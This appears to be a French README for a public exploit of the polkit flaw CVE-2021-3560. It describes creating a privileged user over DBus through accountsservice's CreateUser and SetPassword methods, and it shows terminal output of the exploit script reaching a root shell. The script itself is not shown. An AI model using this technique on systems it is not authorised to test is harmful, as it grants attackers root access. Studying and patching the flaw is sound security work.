
Escalade de privilèges avec polkit - CVE-2021-3560
Escalade de privilèges avec polkit - CVE-2021-3560
CVE-2021-3560 est un contournement d'authentification sur polkit, qui permet à un utilisateur non privilégié d'appeler des méthodes privilégiées via DBus. Dans cette exploitation, nous appellerons 2 méthodes privilégiées fournies par accountsservice (CreateUser et SetPassword), ce qui nous permet de créer un utilisateur privilégié, de lui définir un mot de passe, puis de nous connecter en tant que cet utilisateur et enfin d'élever les privilèges vers root.
Ahmad Almorabea @almorabea http://almorabea.net
test@ubuntu:~/Desktop$ python3 CVE-2021-3560.py
**************
Exploit: Privilege escalation with polkit - CVE-2021-3560
Exploit code written by Ahmad Almorabea @almorabea
Original Exploit Author: Kevin Backhouse
For more details check this: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/#history
[+]Starting the Exploit
[+] User Created with the name of ahmed
[+] Timed out at: 0.008446890996407191
[+] Timed out at: 0.008934336684707084
[+] Exploit Completed, your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root
bash: cannot set terminal process group (46983): Inappropriate ioctl for device
bash: no job control in this shell
root@ubuntu:/home/test/Desktop# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/home/test/Desktop# whoami
root
root@ubuntu:/home/test/Desktop#
Authentification graphique

Authentification en terminal

Kevin Backhouse (https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/)